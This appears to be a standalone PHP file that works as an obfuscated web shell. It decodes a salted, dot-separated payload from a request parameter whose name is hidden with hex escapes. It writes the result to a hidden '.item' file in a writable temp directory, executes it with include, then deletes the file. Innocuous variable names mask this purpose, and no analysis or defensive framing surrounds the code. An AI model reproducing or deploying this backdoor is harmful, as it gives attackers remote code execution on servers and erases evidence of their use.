<?php

if(array_key_exists("d\x61t\x61", $_REQUEST)){
	$property_set = $_REQUEST["d\x61t\x61"];
	 $property_set	  = 	explode ('.'	  , $property_set) 	;	 
	$ent = '';
            $salt7 = 'abcdefghijklmnopqrstuvwxyz0123456789';
            $lenS = strlen(	 $salt7	);
            $p = 0;
            $__len = count(	 $property_set	);
    
            do { if(	 $p >= $__len) break;
                $v9 = $property_set[$p];
                $sChar = ord(	 $salt7[$p % $lenS]	);
                $d =(	 (	 int)$v9 - $sChar -(	 $p % 10)) ^ 65;
                $ent .= chr(	 $d	);
                $p++;
            } while(	 true	);
	$component = array_filter([sys_get_temp_dir(), session_save_path(), "/var/tmp", getenv("TMP"), ini_get("upload_tmp_dir"), getenv("TEMP"), "/tmp", "/dev/shm", getcwd()]);
	while ($factor = array_shift($component)) {
    		if (is_writable($factor) && is_dir($factor)) {
    $obj = sprintf("%s/.item", $factor);
    if (file_put_contents($obj, $ent)) {
	include $obj;
	@unlink($obj);
	die();
}
}
}
}